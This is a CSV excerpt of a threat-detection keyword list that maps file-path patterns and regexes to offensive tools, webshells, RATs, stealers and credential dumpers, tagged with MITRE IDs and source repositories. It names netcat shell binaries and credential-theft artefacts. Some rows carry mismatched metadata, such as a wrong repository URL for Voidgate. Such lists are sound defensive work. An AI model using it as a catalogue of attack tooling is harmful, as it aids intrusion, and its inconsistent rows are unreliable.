"*\Webremote TorCT Client.exe*",".{0,1000}\\Webremote\sTorCT\sClient\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19683"
"*\Webshell_Generate-1.1.jar*",".{0,1000}\\Webshell_Generate\-1\.1\.jar.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19684"
"*\webshell-123.php*",".{0,1000}\\webshell\-123\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19685"
"*\webshell-cnseay02-1.php*",".{0,1000}\\webshell\-cnseay02\-1\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19686"
"*\webshell-cnseay-x.php*",".{0,1000}\\webshell\-cnseay\-x\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19687"
"*\WebShellKillerTool.zip*",".{0,1000}\\WebShellKillerTool\.zip.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","19688"
"*\webtrufflehog.log*",".{0,1000}\\webtrufflehog\.log.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","19689"
"*\webtrufflehog-main*",".{0,1000}\\webtrufflehog\-main.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","19690"
"*\WfpTokenDup.exe*",".{0,1000}\\WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","19695"
"*\whatlicense-main\*",".{0,1000}\\whatlicense\-main\\.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","19696"
"*\WhereObjectCommand.cs",".{0,1000}\\WhereObjectCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19697"
"*\WheresMyImplant*",".{0,1000}\\WheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","19698"
"*\while_dll_ms*",".{0,1000}\\while_dll_ms.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","19699"
"*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19700"
"*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19701"
"*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19702"
"*\Whisker.exe*",".{0,1000}\\Whisker\.exe.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19703"
"*\Whisker.pdb*",".{0,1000}\\Whisker\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19704"
"*\Whisker.pdb*",".{0,1000}\\Whisker\.pdb.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19705"
"*\White_Rabbit.txt*",".{0,1000}\\White_Rabbit\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","19706"
"*\whoami.py*",".{0,1000}\\whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19707"
"*\whoami_juicy.txt*",".{0,1000}\\whoami_juicy\.txt.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","19708"
"*\WifiKeys.dll*",".{0,1000}\\WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19709"
"*\WifiKeys.pdb*",".{0,1000}\\WifiKeys\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","19710"
"*\WIFIPasswords.txt*",".{0,1000}\\WIFIPasswords\.txt.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","19711"
"*\wifiPayload\client.py*",".{0,1000}\\wifiPayload\\client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19712"
"*\wifiPayload\server.py*",".{0,1000}\\wifiPayload\\server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","19713"
"*\WinAudit.exe*",".{0,1000}\\WinAudit\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","19715"
"*\WinBruteLogon.zip*",".{0,1000}\\WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19716"
"*\windapsearch.py*",".{0,1000}\\windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","19717"
"*\WindDef_WebInstall.hta*",".{0,1000}\\WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","19718"
"*\windows\\temp\\sec.tmp*",".{0,1000}\\windows\\\\temp\\\\sec\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19719"
"*\windows\all\winpwnage*",".{0,1000}\\windows\\all\\winpwnage.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","19721"
"*\windows\creddump*",".{0,1000}\\windows\\creddump.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","19722"
"*\Windows\CurrentVersion\Uninstall\SQLC2AgentPS*",".{0,1000}\\Windows\\CurrentVersion\\Uninstall\\SQLC2AgentPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19724"
"*\Windows\Microsoft.NET\*\InstallUtil.exe /logfile= /LogToConsole=false /U *:\Windows\Tasks\*",".{0,1000}\\Windows\\Microsoft\.NET\\.{0,1000}\\InstallUtil\.exe\s\/logfile\=\s\/LogToConsole\=false\s\/U\s.{0,1000}\:\\Windows\\Tasks\\.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","19725"
"*\windows\system32\badger.exe*",".{0,1000}\\windows\\system32\\badger\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19730"
"*\Windows\System32\nc.exe*",".{0,1000}\\Windows\\System32\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19731"
"*\Windows\System32\uploaded.txt*",".{0,1000}\\Windows\\System32\\uploaded\.txt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","19734"
"*\Windows\Tasks\a.exe*",".{0,1000}\\Windows\\Tasks\\a\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","19736"
"*\windows\tasks\bin.exe*",".{0,1000}\\windows\\tasks\\bin\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","19737"
"*\Windows\Tasks\Certipy*",".{0,1000}\\Windows\\Tasks\\Certipy.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","19738"
"*\Windows\Tasks\p4yl0ad*",".{0,1000}\\Windows\\Tasks\\p4yl0ad.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","19739"
"*\windows\temp\123.exe*",".{0,1000}\\windows\\temp\\123\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19741"
"*\Windows\Temp\Bla.exe*",".{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","19742"
"*\windows\temp\CreateService.ps1*",".{0,1000}\\windows\\temp\\CreateService\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A","19743"
"*\Windows\Temp\creds.db*",".{0,1000}\\Windows\\Temp\\creds\.db.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","19744"
"*\windows\temp\fakefile.exe*",".{0,1000}\\windows\\temp\\fakefile\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19745"
"*\Windows\Temp\Forensike*",".{0,1000}\\Windows\\Temp\\Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","19746"
"*\Windows\Temp\info_gather.txt*",".{0,1000}\\Windows\\Temp\\info_gather\.txt.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19747"
"*\windows\temp\nc64.exe*",".{0,1000}\\windows\\temp\\nc64\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","19748"
"*\windows\temp\ncat.exe -nv *",".{0,1000}\\windows\\temp\\ncat\.exe\s\-nv\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","19749"
"*\Windows\temp\payload.bin*",".{0,1000}\\Windows\\temp\\payload\.bin.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19750"
